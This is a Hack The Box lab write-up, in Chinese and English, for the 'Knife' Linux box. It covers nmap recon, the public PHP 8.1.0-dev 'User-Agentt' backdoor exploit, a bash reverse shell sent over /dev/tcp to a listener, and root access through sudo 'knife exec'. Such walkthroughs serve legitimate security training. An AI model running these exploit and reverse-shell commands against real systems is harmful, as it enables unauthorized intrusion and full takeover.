# Hack The Box - Knife Writeup Writeup for the box Knife in Hack The Box. ## Box Info | OS | Difficulty | | ----- |:---------- | | Linux | Easy | ## Recon ### Nmap Basic Scan： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ sudo nmap 10.10.10.242 -oA nmap/initial Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 15:33 CST Nmap scan report for 10.10.10.242 Host is up (1.0s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 5.29 seconds ``` Default Script & Version Scan： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ sudo nmap 10.10.10.242 -p22,80 -sC -sV -oA nmap/knife Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 15:34 CST Nmap scan report for 10.10.10.242 Host is up (0.28s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.01 seconds ``` ### Web Service - Port 80 從 `Wappalyzer` 的分析結果中可以知道，這個網站使用的了 php 8.1：  而用 `searchsploit` 搜索後，可以看到有一個值得嘗試的選項： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ searchsploit php 8.1 <SNIP> PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py ``` ## Shell as james 將 script 複製到目錄中並執行，就可以看到成功拿到 shell 了： ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ searchsploit -m 49933 Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution URL: https://www.exploit-db.com/exploits/49933 Path: /usr/share/exploitdb/exploits/php/webapps/49933.py Codes: N/A Verified: True File Type: Python script, ASCII text executable Copied to: /home/parallels/Documents/Hack The Box/Knife/49933.py ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ python3 49933.py Enter the full host url: http://10.10.10.242 Interactive shell is opened on http://10.10.10.242 Can't acces tty; job crontol turned off. $ $ bash -c "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1" ``` ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Knife] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.4] from (UNKNOWN) [10.10.10.242] 40026 bash: cannot set terminal process group (1030): Inappropriate ioctl for device bash: no job control in this shell james@knife:/$ ``` ### user.txt ```bash james@knife:~$ cat user.txt efdeece2************************ ``` ## Shell as root 檢查 sudo 權限後會發現可以透過 root 身份執行 `knife`，所以我們可以直接透過這個工具提權： ```bash james@knife:~$ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife ``` ```bash james@knife:~$ sudo knife exec -E 'exec "/bin/bash"' root@knife:/home/james# ``` ### root.txt ```shell root@knife:~# cat root.txt f1637e15************************ ```